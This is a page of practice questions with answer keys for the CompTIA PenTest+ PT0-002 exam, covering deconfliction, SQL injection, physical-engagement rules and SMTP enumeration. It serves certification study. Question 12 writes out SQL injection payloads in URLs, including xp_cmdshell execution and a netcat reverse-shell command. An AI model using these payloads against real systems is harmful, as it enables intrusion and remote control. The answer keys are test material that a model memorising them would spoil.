Practice Exams:

Free PT0-002 Exam Braindumps

Pass your CompTIA PenTest+ Certification Exam exam with these free Questions and Answers

Page 4 of 56
PDF with 278 Questions
QUESTION 11

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

  1. A. Situational awareness
  2. B. Rescheduling
  3. C. DDoS defense
  4. D. Deconfliction

Correct Answer: D
https://redteam.guide/docs/definitions/

QUESTION 12

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:
http://company.com/catalog.asp?productid=22
The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:
http://company.com/catalog.asp?productid=22;WAITFOR
DELAY '00:00:05'
Which of the following should the penetration tester attempt NEXT?

  1. A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'
  2. B. http://company.com/catalog.asp?productid=22' OR 1=1 -
  3. C. http://company.com/catalog.asp?productid=22' UNION SELECT 1,2,3 -
  4. D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Correct Answer: C
This URL will attempt a SQL injection attack using a UNION operator to combine the results of two queries into one table. The attacker can use this technique to retrieve data from other tables in the database that are not normally accessible through the web application.

QUESTION 13

A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?

  1. A. Prying the lock open on the records room
  2. B. Climbing in an open window of the adjoining building
  3. C. Presenting a false employee ID to the night guard
  4. D. Obstructing the motion sensors in the hallway of the records room

Correct Answer: C
"to be conducted after hours and should not include circumventing the alarm or performing destructive entry"

QUESTION 14

A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal?

  1. A. VRFY and EXPN
  2. B. VRFY and TURN
  3. C. EXPN and TURN
  4. D. RCPT TO and VRFY

Correct Answer: A

QUESTION 15

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

  1. A. <#
  2. B. <$
  3. C. ##
  4. D. #$
  5. E. #!

Correct Answer: E

Page 4 of 56
PDF with 278 Questions

Post your Comments and Discuss CompTIA PT0-002 exam with other Community members: